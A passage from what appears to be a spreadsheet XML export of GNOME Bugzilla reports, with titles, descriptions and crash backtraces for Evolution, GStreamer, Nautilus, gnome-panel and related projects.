the Full Name... or Address... buttons the text boxes in the 
resulting popup window are editable and do update the LDAP database when 
Save and Close is selected.
Single-clicking on entry fields in the main address book window does 
allow me to edit them.
The New Contact button functions identically to double-clicking on an 
entry that is all the labels are greyed out and the text boxes are 
uneditable but the Full Name... and Address... popups both work and 
will successfully update the database when I click Save and Close.
The LDAP backend is OpenLDAP 2 and all permissions appear to be set 
correctly. The database is accessible through Mozilla and an LDAP 
client such as GQ is able to connect as users and query/update the 
remote database normally.</t>
  </si>
  <si>
    <t>plegato</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-330640</t>
  </si>
  <si>
    <t>Exchange storage crashes after modifying a single instance of recurring meeting</t>
  </si>
  <si>
    <t>Create a recurring meeting in exchange calendar.
Modify a single instance of recurring meeting.
Exchange storage crashes always.
Pasted stack traces of crash.
Backtrace was generated from '/opt/gnome/libexec/evolution-exchange-storage'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.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Thread debugging using libthread_db enabled]
[New Thread -1233881424 (LWP 23943)]
[New Thread -1304458336 (LWP 24225)]
[New Thread -1235461216 (LWP 23944)]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0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb68867b3 in poll () from /lib/libc.so.6
#2  0xb691dcf3 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
#3  0xb691e069 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#4  0xb6bf7b83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#5  0x0805b79f in main ()
Thread 3 (Thread -1235461216 (LWP 23944)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68867b3 in poll () from /lib/libc.so.6
No symbol table info available.
#2  0xb691dcf3 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb691e069 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb6a36f10 in link_set_io_thread () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb693889f in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb697e3bb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0xb688f98e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread -1304458336 (LWP 24225)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6984f8b in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7be2a3d in gnome_init_with_popt_table () from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7f577ac in pvl_data () from /opt/gnome/lib/libecal-1.2.so.3
No symbol table info available.
#5  0xb7f469bc in icalcomponent_new_clone () from /opt/gnome/lib/libecal-1.2.so.3
No symbol table info available.
#6  0x08075ec6 in get_object ()
No symbol table info available.
#7  0xb7f9db9c in e_cal_backend_sync_get_object () from /opt/gnome/lib/libedata-cal-1.2.so.1
No symbol table info available.
#8  0xb7f9dc92 in _e_cal_backend_get_object () from /opt/gnome/lib/libedata-cal-1.2.so.1
No symbol table info available.
#9  0xb7f97cf2 in e_cal_backend_get_object () from /opt/gnome/lib/libedata-cal-1.2.so.1
No symbol table info available.
#10 0xb7fa1cc8 in impl_Cal_getObject () from /opt/gnome/lib/libedata-cal-1.2.so.1
No symbol table info available.
#11 0xb7f925fa in _ORBIT_skel_small_GNOME_Evolution_Calendar_Cal_getObject ()
   from /opt/gnome/lib/libedata-cal-1.2.so.1
No symbol table info available.
#12 0xb6a2b697 in IOP_start_profiles () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#13 0xb6a31865 in ORBit_OAObject_invoke () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#14 0xb6a1edb7 in ORBit_small_invoke_adaptor () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#15 0xb6a2f3ce in ORBit_recv_buffer_return_sys_exception () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#16 0xb6a2fa62 in ORBit_recv_buffer_return_sys_exception () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#17 0xb6a17c7d in giop_thread_queue_process () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#18 0xb6a185b8 in giop_init () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#19 0xb693a4c0 in g_thread_pool_push () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#20 0xb693889f in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#21 0xb697e3bb in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#22 0xb688f98e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1233881424 (LWP 23943)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68867b3 in poll () from /lib/libc.so.6
No symbol table info available.
#2  0xb691dcf3 in g_main_context_check () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb691e069 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb6bf7b83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#5  0x0805b79f in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>GLIB-406120</t>
  </si>
  <si>
    <t>g_ascii_strtod</t>
  </si>
  <si>
    <t>g_ascii_strtod has a few problems:
1. It depends on strtod and thus carries implementation differences with
   it.  strtod (1d1 NULL) will give you 10.0 on Win32 1.0 on Linux.
2. Contrary to documentation it will accept localized versions of
   infinite nan and possibly numbers.   See  C99 7.20.1.3 #6.
3. The test code for this function fails to test nan signs.  There is
   no reason to suspect the sign would come out wrong though.
This might be considered a documentation issue.</t>
  </si>
  <si>
    <t>GSTREAMER-135115</t>
  </si>
  <si>
    <t>Use of non-standard test(1) operator</t>
  </si>
  <si>
    <t>The as-docbook.m4 file used when generating gstreamer's configure and 
included in gstreamer/common/m4 calls the test utility using the == 
operator.  This is not POSIX (a GNU extension) which fails on some 
systems that don't support it like NetBSD.  This results in incorrect 
detection of xsltproc. 
The solution is trivial: replace the == operator with = which is 
standard.</t>
  </si>
  <si>
    <t>GSTREAMER-343827</t>
  </si>
  <si>
    <t>leak in gst_index_gtype_resolver</t>
  </si>
  <si>
    <t>spotted by coverity checker (CID: 2775)
561  	    *writer_string = g_strdup_printf (%s.%s
562  	        g_type_name (G_OBJECT_TYPE (element)) gst_object_get_name (writer))
the string returned by gst_object_get_name is leaked</t>
  </si>
  <si>
    <t>XCHAT-GNOME-327455</t>
  </si>
  <si>
    <t>x-g should not quit when closing the last server</t>
  </si>
  <si>
    <t>x-g should not quit when closing the last server. If you connect to a wrong
server you shouldn't have to restart x-g to connect to the good one.
Other information:</t>
  </si>
  <si>
    <t>GAZPACHO-171962</t>
  </si>
  <si>
    <t>The project menu should not be removed when the last project is closed</t>
  </si>
  <si>
    <t>The project menu should not be removed when the last project is closed. Istead
it should display an insensitive 'empty' item.</t>
  </si>
  <si>
    <t>GNOME-PANEL-389763</t>
  </si>
  <si>
    <t>Dragging launcher icon on panel removes launcher properties</t>
  </si>
  <si>
    <t>Please describe the problem:
When you add an Application Launcher icon to the panel and try more than once to drag and drop it to another spot on the panel the icon loses its properties and changes to a ? icon. If you check the properties of the icon now there are none. A Custom Applicaiton Launcher cannot be dragged more than once.
Steps to reproduce:
1. Add a Launcher icon to the panel
2. Drag it to another spot on the panel
3. Drag it back
4. Note icon changes
Actual results:
The icon changes to a ? icon and the shortcut properties are gone.
Expected results:
The icon should move where you dragged it to.
Does this happen every time?
For me yes. 
Other information:
I'm running Gnome 2.16.1 compiled from gentoo portage (~x86) on 12/17/06 on a Thinkpad t60p.</t>
  </si>
  <si>
    <t>TOTEM-515809</t>
  </si>
  <si>
    <t>change licence of totem-subtitle-encoding.c to LGPL</t>
  </si>
  <si>
    <t>According to our discussion by mail and with the approval of its author totem-subtitle-encoding.c have to be relicensed under LGPL.</t>
  </si>
  <si>
    <t>NAUTILUS-48292</t>
  </si>
  <si>
    <t>Thumbnails of text files are not updated with fam support</t>
  </si>
  <si>
    <t xml:space="preserve">If you display a folder in Nautilus containing a text file open the text file
in an external editor change the file and save it the thumbnail of the text
file is not automatically updated. Fam support is working otherwise (with the
exception of a few other bugs that I'm reporting separately).
How to reproduce:
The best way is to open a text editor like nedit and save a blank file to the
folder that's being displayed by Nautilus. A blank thumbnail should appear for
that file. Now add some text to the file and save it again. The thumbnail should
now contain a snapshot of the text that was just added but it doesn't.
A workaround is to hit the Refresh button in the toolbar.
I'm working on a Mandrake 7.2 system running GNOME 1.4 (from Cooker) plus
Nautilus 1.0.3.
Andrew
------- Additional Comments From snickell@stanford.edu 2001-07-23 00:36:41 ----
Taking bugs previously assigned to Pavel assigning them to myself. Will parse
them out at my leisure  but many are GnomeVFS bugs we should look at for 2.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>apost</t>
  </si>
  <si>
    <t>EVOLUTION-241564</t>
  </si>
  <si>
    <t>Fails to import from mozilla and balsa</t>
  </si>
  <si>
    <t>Description of Problem:
Fails to import the mail from mozilla or balsa
Steps to reproduce the problem:
1. File -&gt; Import
2. Forward
3. Import a single file
4. Browse to the file
5. Select mbox or automatic
6. Forward
7. Import
8. Select destination folder
9. If Automatic selected get message
    There is no importer that is able to handle...
   If mbox selected
    Dialog box disappears and nothing happens
How often does this happen? 
  Everytime</t>
  </si>
  <si>
    <t>GALEON-55053</t>
  </si>
  <si>
    <t>By default there is mo quick way of pasting in URLs</t>
  </si>
  <si>
    <t>Netscape and Mozilla allow a user to middle-mouse-paste a URL into the pane
of an open browser window to open the URL. This is an exceptionally easy
thing to implement and use - much better value than bringing up the bookmarks
menu.
 Could this be made the default action - I didn't know it could be changed
until I went looking for it and spent weeks cursing Galeon till I discovered
it!</t>
  </si>
  <si>
    <t>valen</t>
  </si>
  <si>
    <t>NAUTILUS-61517</t>
  </si>
  <si>
    <t>Moving files across partitions doesn't display progress bar.</t>
  </si>
  <si>
    <t>See subject.  Copying files across partitions opens a progress dialog but
moving files doesn't display any kind of progress indicator at all.</t>
  </si>
  <si>
    <t>eem12</t>
  </si>
  <si>
    <t>EVOLUTION-215661</t>
  </si>
  <si>
    <t>configure can't detect heimdal</t>
  </si>
  <si>
    <t>Description of Problem:
Evo's configure.in expects to find kerberos/heimdal headers and libs under
a common directory (--with-krb[4|5]). This fails if kerberos/heimdal
headers are installed under different directories.
Eg. SuSE-7.2
rpm -ql heimdal-devel
..
/usr/include/heimdal/krb5.h
..
/usr/lib/heimdal/lib/libkrb5.la
..
Steps to reproduce the problem:
Try to configure evo with kerberos support.
Actual Results:
configure failing to find kerberos/heimdal
Expected Results:
Finding kerberos/heimdal</t>
  </si>
  <si>
    <t>rc040203</t>
  </si>
  <si>
    <t>EPIPHANY-306565</t>
  </si>
  <si>
    <t>Epiphany not compiling properly against dbus 0.3x</t>
  </si>
  <si>
    <t>Please describe the problem:
Some fixes are needed to make it compile cleanly due to API changes
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>rslinckx</t>
  </si>
  <si>
    <t>EOG-309376</t>
  </si>
  <si>
    <t>kill eog-hig-dialog</t>
  </si>
  <si>
    <t>typical while-watching-tv patch... getting rid of eog-hig-dialog.[ch] since
the api for hig compliant dialogs is in gtk 2.6.
Mixed in there there is also a leak fix (a strdup string used in a dialog not
freed) and some improvements to the delete confirmation dialog (bug #309046).
No strings were changed.</t>
  </si>
  <si>
    <t>SYSADMIN-617279</t>
  </si>
  <si>
    <t>create-auth should check if LDAP database is empty</t>
  </si>
  <si>
    <t>e.g. when there are no people to create an account for
In that case it should abort and probably complain about it</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-109992</t>
  </si>
  <si>
    <t>gnotravex</t>
  </si>
  <si>
    <t>Latest gnotravex doesn't build on Solaris with Sun compilers</t>
  </si>
  <si>
    <t>GSTREAMER-326602</t>
  </si>
  <si>
    <t>id3demux is not compiling without ZLIB</t>
  </si>
  <si>
    <t>id3demux plugin (id3v2frames.c) is not compiling without ZLIB:
uLongf - undeclared identifier
Bytef - undeclared identifier
Z_OK - undeclared identifier
...
Actually there are two ways of fixing this.
1. Remove #ifdef HAVE_ZLIB from the top of the source file and make ZLIB a requirement for this plugin.
2. Apply the patch below to fix compilation and report that compressed frames could not be processed if plugin is compiled without ZLIB. The same is done now for Encrypted frames.</t>
  </si>
  <si>
    <t>sergey.scobich</t>
  </si>
  <si>
    <t>GUCHARMAP-332880</t>
  </si>
  <si>
    <t>parameter --disable-gnome doesn't has effect</t>
  </si>
  <si>
    <t>If gucharmap is configured with --disable-gnome still keeps searching for gnome-doc-utils and configure does not finish.</t>
  </si>
  <si>
    <t>davidge</t>
  </si>
  <si>
    <t>GNOME-PANEL-167090</t>
  </si>
  <si>
    <t>Run Applications should be dropped from main menus</t>
  </si>
  <si>
    <t>I mentioned how it shouldn't be in the Applications menu as a top level item in
bug 161613  However it seems to have gotten in anyway. :-\
If it's in there just because we couldn't find a place for it I'd like to see it
dropped all together.  It is an applet after all so the 'power user' can still
access it quickly.  Most 'power user' people I know use it with the Alt-F2
combination to call this dialog.  
Leaving it at the top level of Applications makes our menu appear as if you'll
need to type in commands to this dialog in order to run parts of the desktop. 
And that's not the message I want to send.</t>
  </si>
  <si>
    <t>GTK+-61696</t>
  </si>
  <si>
    <t>size_request implementation in wrong order</t>
  </si>
  <si>
    <t>It looks like tree_view-&gt;priv-&gt;header_height is used in size request prior
to calling gtk_tree_view_size_request_buttons()</t>
  </si>
  <si>
    <t>PANGO-152529</t>
  </si>
  <si>
    <t>Empty status bar is smaller by 1 pixel with no hinting</t>
  </si>
  <si>
    <t>When there is no text in the status bar it is smaller by 1 pixel than when
there is text in it. This creates weird effects when your mouse pointer hovers
on http links in a feed post : the status bar resizes every time and with it
the side pane and main post window.</t>
  </si>
  <si>
    <t>vincent.noel</t>
  </si>
  <si>
    <t>GNOME-PANEL-393901</t>
  </si>
  <si>
    <t>Do not hardcode invisible_char in glade files</t>
  </si>
  <si>
    <t>Many distributions patch Gtk to use a nicer invisible char such as 'â—'
0x25cf or 0x2022 instead of '*' and 'gnome-panel' glade files already
use 'â—'.
I will attach a patch to strip the invisible_char from the glade files and
hence rely on the Gtk default.
Other information:</t>
  </si>
  <si>
    <t>betalb</t>
  </si>
  <si>
    <t>EVOLUTION-203783</t>
  </si>
  <si>
    <t>mail crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.10.99
Synopsis: mail crashed
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
not sure what happened.  I was in another window when it crashed.  I'm guessing it was off getting IMAP again.  sorry if this is duplicating another report.
Debugging Information:
[New Thread 1024 (LWP 6730)]
0x40905519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40905519 in __wait4 () from /lib/i686/libc.so.6
#1  0x409759e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40689563 in waitpid (pid=6922 stat_loc=0xbfffe92c options=0)
    at wrapsyscall.c:172
#3  0x402b7262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x40687935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 135061872 esi = 135069832 ebp = 3221220608 esp = 3221220564 ebx = 135396056 edx = 0 ecx = 135396056 eax = 101 trapno = 14 err = 4 eip = 1082981546 cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221220564 ss = 43 __ssh = 0 fpstate = 0xbfffea58 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x408cfcaa in strcmp () from /lib/i686/libc.so.6
#7  0x08063e3c in socket_destroy_cb (socket_widget=0x811f308 data=0x80d0088)
    at e-shell-view.c:1586
#8  0x4045fe4b in gtk_marshal_NONE__NONE (object=0x811f308 
    func=0x8063d4c  func_data=0x80d0088 args=0xbfffedf8)
    at gtkmarshal.c:312
#9  0x4048f56a in gtk_handlers_run (handlers=0x8192348 signal=0xbfffed98 
    object=0x811f308 params=0xbfffedf8 after=0) at gtksignal.c:1917
#10 0x4048e9bb in gtk_signal_real_emit (object=0x811f308 signal_id=1 
    params=0xbfffedf8) at gtksignal.c:1477
#11 0x4048ca30 in gtk_signal_emit (object=0x811f308 signal_id=1)
    at gtksignal.c:552
#12 0x40471909 in gtk_object_shutdown (object=0x811f308) at gtkobject.c:255
#13 0x404c7ba1 in gtk_widget_shutdown (object=0x811f308) at gtkwidget.c:4392
#14 0x404718ab in gtk_object_destroy (object=0x811f308) at gtkobject.c:246
#15 0x404c06f1 in gtk_widget_destroy (widget=0x811f308) at gtkwidget.c:1391
#16 0x40814288 in bonobo_socket_filter_func (gdk_xevent=0xbffff1d8 
    event=0x80cb1f4 data=0x811f308) at bonobo-socket.c:744
#17 0x40517fff in gdk_event_apply_filters (xevent=0xbffff1d8 event=0x80cb1f4 
    filters=0x818e438) at gdkevents.c:950
#18 0x40518112 in gdk_event_translate (event=0x80cb1f4 xevent=0xbffff1d8)
    at gdkevents.c:1039
#19 0x40518f2f in gdk_events_queue () at gdkevents.c:2055
#20 0x4051914a in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff2e8 user_data=0x0) at gdkevents.c:2133
#21 0x40549055 in g_main_dispatch (dispatch_time=0xbffff2e8) at gmain.c:656
#22 0x40549659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#23 0x405497e8 in g_main_run (loop=0x81d1c00) at gmain.c:935
#24 0x4045e65b in gtk_main () at gtkmain.c:524
#25 0x40292e1e in gnome_dialog_run_real (dialog=0x80d51b8 close_after=0)
    at gnome-dialog.c:663
#26 0x40292f1c in gnome_dialog_run (dialog=0x80d51b8) at gnome-dialog.c:715
#27 0x4009b1e3 in e_notice (window=0x80d0088 type=0x80782ae error 
    format=0x8078240 Ooops!  The view for `%s' have died unexpectedly.  :-(\nThis probably means that the %s component has crashed.) at e-gui-utils.c:38
#28 0x0806708d in e_shell_component_maybe_crashed (shell=0x80c7e08 
    uri=0x8188910 evolution:/scott@leerssen.com/INBOX 
    type_name=0x80cd7d0 mail shell_view=0x80d0088) at e-shell.c:1196
#29 0x08063e79 in socket_destroy_cb (socket_widget=0x811de40 data=0x80d0088)
    at e-shell-view.c:1591
#30 0x4045fe4b in gtk_marshal_NONE__NONE (object=0x811de40 
    func=0x8063d4c  func_data=0x80d0088 args=0xbffff548)
    at gtkmarshal.c:312
#31 0x4048f56a in gtk_handlers_run (handlers=0x81a15f0 signal=0xbffff4e8 
    object=0x811de40 params=0xbffff548 after=0) at gtksignal.c:1917
#32 0x4048e9bb in gtk_signal_real_emit (object=0x811de40 signal_id=1 
    params=0xbffff548) at gtksignal.c:1477
#33 0x4048ca30 in gtk_signal_emit (object=0x811de40 signal_id=1)
    at gtksignal.c:552
#34 0x40471909 in gtk_object_shutdown (object=0x811de40) at gtkobject.c:255
#35 0x404c7ba1 in gtk_widget_shutdown (object=0x811de40) at gtkwidget.c:4392
#36 0x404718ab in gtk_object_destroy (object=0x811de40) at gtkobject.c:246
#37 0x404c06f1 in gtk_widget_destroy (widget=0x811de40) at gtkwidget.c:1391
#38 0x40814288 in bonobo_socket_filter_func (gdk_xevent=0xbffff928 
    event=0x80cb198 data=0x811de40) at bonobo-socket.c:744
#39 0x40517fff in gdk_event_apply_filters (xevent=0xbffff928 event=0x80cb198 
    filters=0x818e600) at gdkevents.c:950
#40 0x40518112 in gdk_event_translate (event=0x80cb198 xevent=0xbffff928)
    at gdkevents.c:1039
#41 0x40518f2f in gdk_events_queue () at gdkevents.c:2055
#42 0x4051914a in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffffa38 user_data=0x0) at gdkevents.c:2133
#43 0x40549055 in g_main_dispatch (dispatch_time=0xbffffa38) at gmain.c:656
#44 0x40549659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#45 0x405497e8 in g_main_run (loop=0x80c6360) at gmain.c:935
#46 0x4045e65b in gtk_main () at gtkmain.c:524
#47 0x407464bf in bonobo_main () at bonobo-main.c:277
#48 0x080716c8 in main (argc=1 argv=0xbffffbdc) at main.c:238
#49 0x40867177 in __libc_start_main (main=0x8071550  argc=1 
    ubp_av=0xbffffbdc init=0x8052a38  fini=0x80728ac  
    rtld_fini=0x4000e184  stack_end=0xbffffbd4)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40905519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x409759e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40689563 in waitpid (pid=6922 stat_loc=0xbfffe92c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe92c
options = 0
result = 0
oldtype = 0
#3  0x402b7262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 135742168
in_segv = 1
pid = 0
#4  0x40687935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 135061872 esi = 135069832 ebp = 3221220608 esp = 3221220564 ebx = 135396056 edx = 0 ecx = 135396056 eax = 101 trapno = 14 err = 4 eip = 1082981546 cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221220564 ss = 43 __ssh = 0 fpstate = 0xbfffea58 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  0x408cfcaa in strcmp () from /lib/i686/libc.so.6
No locals.
#7  0x08063e3c in socket_destroy_cb (socket_widget=0x811f308 data=0x80d0088)
    at e-shell-view.c:1586
	in e-shell-view.c
socket_widget = (GtkWidget *) 0x80d0088
data = 0x811fad8
shell_view = (EShellView *) 0x80d0088
priv = (EShellViewPrivate *) 0x80ce318
folder = (EFolder *) 0x80ce170
control = (GtkWidget *) 0x80ce170
uri = 0x811fad8 evolution:/sleerssen@racemi.com/INBOX
copy_of_uri = 0x8170c38 evolution:/sleerssen@racemi.com/INBOX
Reassigning to the default owner of the component evolution-mail-maintainers@ximian.com.
</t>
  </si>
  <si>
    <t>GNOME-MAIN-MENU-402621</t>
  </si>
  <si>
    <t>libslab</t>
  </si>
  <si>
    <t>gnome-control-center wipes out /home/user</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/ubuntu/+source/control-center/+bug/78500
Binary package hint: gnome-control-center
How to reproduce : start gnome-control-center select (the old) disk-admin icon left behind from dapper right click with mouse and select remove starter from the popup menu. As a result of this you'll find you're /home/user directory wiped clean ! :-( I've just lost my whole setup and all my documents just doing these simple steps I'm lucky to own a recent disc-image of that partition. -)
...
&gt; The gconf key to get the value from is rather that one: /desktop/gnome/applications/main-menu/file-area/user_startup_dir
...
Launching gconftool produces this output: No value set for /desktop/gnome/applications/main-menu/file-area/user_startup_dir
...
The problem is that the schemas for that key is shipped with gnome-main-menu and not gnome-control-center
The code from application-tile.c does that then:
 	gconf_startupdir = get_slab_gconf_string (SLAB_USER_STARTUP_DIR_KEY)
	src_filename = g_build_filename (g_get_home_dir () gconf_startupdir ditem_basename NULL)
	src_uri = gnome_vfs_uri_new (src_filename)
	list = g_list_append (list src_uri)
	gnome_vfs_xfer_delete_list (
		list GNOME_VFS_XFER_ERROR_MODE_ABORT
		GNOME_VFS_XFER_REMOVESOURCE NULL NULL)
	priv-&gt;startup_status = APP_NOT_IN_STARTUP_DIR
When the gconf_startupdir has no value then list = USER_DIR which creates the bug described before</t>
  </si>
  <si>
    <t>sreeves</t>
  </si>
  <si>
    <t>LIBGWEATHER-791307</t>
  </si>
  <si>
    <t>LIBGWEATHER</t>
  </si>
  <si>
    <t>Add tests for timezone validity</t>
  </si>
  <si>
    <t>And correct the bugs it shows</t>
  </si>
  <si>
    <t>libgweather-maint</t>
  </si>
  <si>
    <t>TOMBOY-337758</t>
  </si>
  <si>
    <t>panel applet does not expand with panel</t>
  </si>
  <si>
    <t>Many other panel applets expand to fit on a larger panel.  Even if Tomboy's icon
stayed the same the active area of the applet should expand to fit the panel's
size.
Other information:</t>
  </si>
  <si>
    <t>izm</t>
  </si>
  <si>
    <t>BALSA-106003</t>
  </si>
  <si>
    <t>Confusing error dialog when doing send/receive with an empty ougoing mailbox</t>
  </si>
  <si>
    <t>When you hit the send/receive button in the toolbar (don't know the label
in english in french it's a button called Echanger) and you don't have
any message to send in the out mailbox you've got a confusing error
dialog saying 
ProblÃ¨me avec le serveur SMTP (2) : Nothing to do
Le message est laissÃ© dans la boÃ®te d'envoi.
The problem is not the SMTP server but the lacking of message to send.
But that is not a problem for the user : he doesn't care of messages to be
sent or not.
So there shouldn't be any error dialog at all.
If I hit send/receive I'm expecting to get my new messages - if there
are some ! - and to send the waiting ones -if there are some too !.</t>
  </si>
  <si>
    <t>anneetbertrand</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-7719</t>
  </si>
  <si>
    <t>Segfault -- core dump</t>
  </si>
  <si>
    <t>Package: control-center
Severity: critical
Version: 1.0.51
&gt;Synopsis: Segfault -- core dump
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.1.92 (Piglet)
System: Linux 2.2.15-2.5.0 i586 unknown
C library: glibc-2.1.3-6
C compiler: gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) 
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-6
&gt;Description:
When I click on the settings in the right frame before the values
appear in the left frame it opens a few dozen 
gnomecc --activate-goad-server control_center processes
and crashes.  The nice gnome window indicating a crash pops
up but because of the amount of gnomecc processes I have to
kill them manually using killall -KILL gnomecc or els I would
have to click close dozens of times while my system is lagging
from the memory being hogged.  For every option clicked in the 
left frame a few more dozen processes are started.
&gt;How-To-Repeat:
I'm not exactly sure how to reproduce it on another machine but mine
is stuck in a state/condition where it happens everytime I try to
execute it.
It worked fine when I installed ReHat 6.2 beta but I think it started 
when I installed ReHat 6.1 and then upgraded to ReHat 6.2beta using
it's upgrade utility.  From the logs it seems like it might be a
library location 
or version problem which I guess would be as a result of a bug in
RedHat's 
upgrade software.
I am including four things:  gnomecc command line output stack strace
output
the process list for when it is occuring (a mild case) and the core
dump.
I hope this will help.
As you can imagine I am not a programmer.
Debugging information:
(no debugging symbols found)...
Core was generated by `gnomecc --activate-goad-server control_center'.
Program terminated with signal 6 Aborted.
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0  0x0 in ?? ()
#0  0x0 in ?? ()
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
--- Included file '/root/gnomecc.txt' ---
gnomecc output:
NOTE: gnomecc doesn't output this until an option is selected. 
[root@baroque /root]# gnomecc
gnomecc: error in loading shared libraries: libesd.so.0: cannot open shared object file: Error 23
Gdk-WARNING **: locale not supported by C library
Gdk-WARNING **: locale not supported by Xlib locale set to C
Gdk-WARNING **: can not set locale modifiers
_X11TransSocketOpen: socket() failed for local
_X11TransSocketOpenCOTSClient: Unable to open socket for local
_X11TransOpen: transport open failed for local/baroque:0
Gtk-WARNING **: cannot open display: :0                                             
Process list after options are selected:
[root@baroque /root]# ps -uaxw
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  1120   52 ?        S    00:55   0:05 init [5]
root         2  0.0  0.0     0    0 ?        SW   00:55   0:00 [kflushd]
root         3  0.0  0.0     0    0 ?        SW   00:55   0:00 [kupdate]
root         4  0.0  0.0     0    0 ?        SW   00:55   0:00 [kpiod]
root         5  0.0  0.0     0    0 ?        SW   00:55   0:07 [kswapd]
root         6  0.0  0.0     0    0 ?        SW&lt;  00:55   0:00 [mdrecoveryd]
bin        251  0.0  0.0  1208    0 ?        SW   00:55   0:00 [portmap]
root       265  0.0  0.0  1104    0 ?        SW   00:55   0:00 [apmd]
root       316  0.0  0.0  1172    8 ?        S    00:55   0:00 syslogd -m 0
root       325  0.0  0.0  1444    0 ?        SW   00:55   0:00 [klogd]
nobody     339  0.0  0.0  1300   44 ?        S    00:55   0:00 [identd]
root       342  0.0  0.0  1300   44 ?        S    00:55   0:00 [identd]
root       343  0.0  0.0  1300   44 ?        S    00:55   0:00 [identd]
root       344  0.0  0.0  1300   44 ?        S    00:55   0:00 [identd]
root       345  0.0  0.0  1300   44 ?        S    00:55   0:00 [identd]
daemon     357  0.0  0.0  1144    0 ?        SW   00:55   0:00 [atd]
root       371  0.0  0.0  1328   28 ?        S    00:55   0:00 crond
root       389  0.0  0.0  1144    0 ?        SW   00:55   0:00 [inetd]
root       403  0.0  0.0  1204    0 ?        SW   00:55   0:00 [lpd]
root       448  0.0  0.4  2128  268 ?        S    00:55   0:00 sendmail: accepting connections on port 25
root       463  0.0  0.0  1148   52 ?        S    00:55   0:00 gpm -t ps/2
root       477  0.0  0.0  3760   52 ?        S    00:55   0:00 httpd
nobody     489  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
